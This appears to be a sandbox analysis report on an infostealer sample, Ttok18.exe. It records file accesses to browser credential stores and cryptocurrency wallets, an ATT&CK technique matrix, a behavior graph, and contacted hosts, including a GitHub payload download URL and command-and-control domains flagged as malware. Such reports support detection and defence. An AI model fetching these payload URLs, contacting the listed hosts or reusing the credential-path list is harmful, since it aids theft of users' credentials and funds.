            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.db
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
            Source: Yara matchFile source: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 25aac720-4b65-4596-94df-b9a776dc62c7.exe PID: 8080, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 25aac720-4b65-4596-94df-b9a776dc62c7.exe PID: 8080, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading
            1
            DLL Side-Loading
            11
            Disable or Modify Tools
            2
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            2
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            Create Account
            1
            Extra Window Memory Injection
            3
            Obfuscated Files or Information
            1
            Credentials in Registry
            1
            Account Discovery
            Remote Desktop Protocol4
            Data from Local System
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
            Process Injection
            1
            Software Packing
            Security Account Manager4
            File and Directory Discovery
            SMB/Windows Admin SharesData from Network Shared Drive1
            Remote Access Software
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Timestomp
            NTDS44
            System Information Discovery
            Distributed Component Object ModelInput Capture3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets211
            Security Software Discovery
            SSHKeylogging4
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Extra Window Memory Injection
            Cached Domain Credentials41
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
            Masquerading
            DCSync2
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
            Virtualization/Sandbox Evasion
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1568488 Sample: Ttok18.exe Startdate: 04/12/2024 Architecture: WINDOWS Score: 100 59 t.me 2->59 61 raw.githubusercontent.com 2->61 63 2 other IPs or domains 2->63 87 Suricata IDS alerts for network traffic 2->87 89 Antivirus detection for URL or domain 2->89 91 Multi AV Scanner detection for submitted file 2->91 93 6 other signatures 2->93 9 Ttok18.exe 15 7 2->9         started        14 svchost.exe 2->14         started        signatures3 process4 dnsIp5 65 github.com 20.233.83.145, 443, 49736 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 9->65 67 raw.githubusercontent.com 185.199.111.133, 443, 49737 FASTLYUS Netherlands 9->67 51 25aac720-4b65-4596-94df-b9a776dc62c7.exe, PE32 9->51 dropped 53 C:\Users\user\AppData\...\Ttok18.exe.log, CSV 9->53 dropped 95 Adds a directory exclusion to Windows Defender 9->95 16 25aac720-4b65-4596-94df-b9a776dc62c7.exe 9->16         started        20 powershell.exe 7 9->20         started        22 powershell.exe 7 9->22         started        24 2 other processes 9->24 69 127.0.0.1 unknown unknown 14->69 file6 signatures7 process8 dnsIp9 55 t.me 149.154.167.99, 443, 49738 TELEGRAMRU United Kingdom 16->55 57 kresk.lol 159.69.102.165, 443, 49739, 49740 HETZNER-ASDE Germany 16->57 75 Multi AV Scanner detection for dropped file 16->75 77 Attempt to bypass Chrome Application-Bound Encryption 16->77 79 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 16->79 85 5 other signatures 16->85 26 chrome.exe 16->26         started        29 cmd.exe 16->29         started        81 Found many strings related to Crypto-Wallets (likely being stolen) 20->81 83 Adds a directory exclusion to Windows Defender 20->83 31 powershell.exe 23 20->31         started        34 conhost.exe 20->34         started        36 powershell.exe 23 22->36         started        38 conhost.exe 22->38         started        40 powershell.exe 23 24->40         started        42 conhost.exe 24->42         started        signatures10 process11 dnsIp12 71 239.255.255.250 unknown Reserved 26->71 44 chrome.exe 26->44         started        47 conhost.exe 29->47         started        49 timeout.exe 29->49         started        97 Loading BitLocker PowerShell Module 31->97 signatures13 process14 dnsIp15 73 www.google.com 142.250.181.68, 443, 49746, 49750 GOOGLEUS United States 44->73

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Ttok18.exe18%ReversingLabsWin32.Trojan.Genie
            Ttok18.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe100%Joe Sandbox ML
            C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe45%ReversingLabsWin32.Trojan.Generic
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://kresk.lol/%100%Avira URL Cloudmalware
            https://kresk.lol/a100%Avira URL Cloudmalware
            https://kresk.lolIM7GLNO80%Avira URL Cloudsafe
            https://kresk.lol/100%Avira URL Cloudmalware
            https://kresk.loltosh;0%Avira URL Cloudsafe
            https://kresk.lol100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            github.com
            20.233.83.145
            truefalse
              high
              raw.githubusercontent.com
              185.199.111.133
              truefalse
                high
                t.me
                149.154.167.99
                truefalse
                  high
                  www.google.com
                  142.250.181.68
                  truefalse
                    high
                    kresk.lol
                    159.69.102.165
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://t.me/m3wm0wfalse
                        high
                        https://github.com/olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exefalse
                          high
                          https://raw.githubusercontent.com/olosha1/pockket/refs/heads/main/jtkhikadjthsad.exefalse
                            high
                            https://kresk.lol/true
                            • Avira URL Cloud: malware
                            unknown
                            https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                              high
                              https://www.google.com/async/newtab_promosfalse
                                high
                                https://www.google.com/async/ddljson?async=ntp:2false
                                  high
                                  https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                    high
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtab25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.drfalse
                                      high
                                      https://t.me/25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754848565.00000000007FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/ac/?q=25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.drfalse
                                          high
                                          https://web.telegram.org25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000003.2015843390.000000000087C000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000003.2015843390.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754848565.0000000000842000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://crl.microsoftpowershell.exe, 00000004.00000002.1771954716.0000000007E10000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://github.comTtok18.exe, 00000000.00000002.1998627591.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://contoso.com/Licensepowershell.exe, 0000000B.00000002.1881604407.00000000060AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000037B1000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2757142044.0000000003A95000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758340316.0000000003C66000.00000004.00000020.00020000.00000000.sdmp, W4OHLX.15.drfalse
                                                    high
                                                    https://kresk.lol/%25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000003.2042357919.0000000000874000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://g.live.com/odclientsettings/ProdV2.C:edb.log.17.dr, qmgr.db.17.drfalse
                                                      high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.drfalse
                                                        high
                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e1725aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000036EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://g.live.com/odclientsettings/Prod.C:edb.log.17.dr, qmgr.db.17.drfalse
                                                            high
                                                            http://github.comTtok18.exe, 00000000.00000002.1998627591.0000000002EAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://t.me/m3wm0wQ25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754848565.0000000000842000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://steamcommunity.com/profiles/76561199804377619p1up1Mozilla/5.025aac720-4b65-4596-94df-b9a776dc62c7.exe.0.drfalse
                                                                  high
                                                                  https://g.live.com/odclientsettings/ProdV2edb.log.17.dr, qmgr.db.17.drfalse
                                                                    high
                                                                    https://kresk.lolIM7GLNO825aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://steamcommunity.com/profiles/76561199804377619Ttok18.exe, 00000000.00000002.2001059620.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000000.1992854779.000000000045C000.00000008.00000001.01000000.00000008.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe.0.drfalse
                                                                      high
                                                                      https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.1775233319.00000000042C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1775233319.00000000042D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1761784248.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1819373125.000000000433E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1798740573.0000000004841000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1900270450.00000000044A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1900270450.000000000447B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1865159775.0000000005041000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiW4OHLX.15.drfalse
                                                                          high
                                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000036C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.drfalse
                                                                              high
                                                                              https://contoso.com/powershell.exe, 0000000B.00000002.1881604407.00000000060AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1763834008.000000000590A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1807167831.00000000058AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1881604407.00000000060AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://kresk.lol25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754848565.0000000000842000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  https://support.mozilla.org/products/firefoxgro.all25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758763558.0000000003EE2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameTtok18.exe, 00000000.00000002.1998627591.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1775233319.00000000042F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1761784248.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1819373125.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1798740573.0000000004841000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1900270450.0000000004529000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1865159775.0000000005041000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000011.00000003.2174104393.000002A4586C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.drfalse
                                                                                        high
                                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc9425aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000037B1000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2757142044.0000000003A95000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758340316.0000000003C66000.00000004.00000020.00020000.00000000.sdmp, W4OHLX.15.drfalse
                                                                                          high
                                                                                          http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1763834008.000000000590A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1807167831.00000000058AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1881604407.00000000060AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000037B1000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2757142044.0000000003A95000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758340316.0000000003C66000.00000004.00000020.00020000.00000000.sdmp, W4OHLX.15.drfalse
                                                                                              high
                                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.ico25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.drfalse
                                                                                                high
                                                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.1865159775.0000000005196000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.1761784248.00000000049F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1798740573.0000000004996000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1865159775.0000000005196000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.1865159775.0000000005196000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://raw.githubusercontent.comdTtok18.exe, 00000000.00000002.1998627591.0000000002EF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://contoso.com/Iconpowershell.exe, 0000000B.00000002.1881604407.00000000060AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.drfalse
                                                                                                            high
                                                                                                            http://crl.ver)svchost.exe, 00000011.00000002.2956329681.000002A458400000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000037B1000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2757142044.0000000003A95000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758340316.0000000003C66000.00000004.00000020.00020000.00000000.sdmp, W4OHLX.15.drfalse
                                                                                                                high
                                                                                                                https://t.me/m3wm0wG25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754848565.0000000000842000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://github.comdTtok18.exe, 00000000.00000002.1998627591.0000000002EAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201625aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000036EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://aka.ms/pscore6LRpowershell.exe, 00000006.00000002.1819373125.0000000004329000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://www.ecosia.org/newtab/25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.drfalse
                                                                                                                          high
                                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758763558.0000000003EE2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.1865159775.0000000005196000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://kresk.lol/a25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000003.2042357919.0000000000874000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: malware
                                                                                                                              unknown
                                                                                                                              https://ac.ecosia.org/autocomplete?q=25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.drfalse
                                                                                                                                high
                                                                                                                                https://kresk.loltosh;25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://t.me/m3wm0wp1up1Mozilla/5.025aac720-4b65-4596-94df-b9a776dc62c7.exe.0.drfalse
                                                                                                                                  high
                                                                                                                                  http://crl.micropowershell.exe, 00000004.00000002.1760994768.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1812180298.000000000709B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1888125617.000000000780A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000011.00000003.2174104393.000002A4586C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.drfalse
                                                                                                                                      high
                                                                                                                                      https://raw.githubusercontent.comTtok18.exe, 00000000.00000002.1998627591.0000000002EDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000037B1000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2757142044.0000000003A95000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758340316.0000000003C66000.00000004.00000020.00020000.00000000.sdmp, W4OHLX.15.drfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.1761784248.00000000049F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1798740573.0000000004996000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1865159775.0000000005196000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://raw.githubusercontent.comTtok18.exe, 00000000.00000002.1998627591.0000000002EF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000036C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.drfalse
                                                                                                                                                  high
                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  20.233.83.145
                                                                                                                                                  github.comUnited States
                                                                                                                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
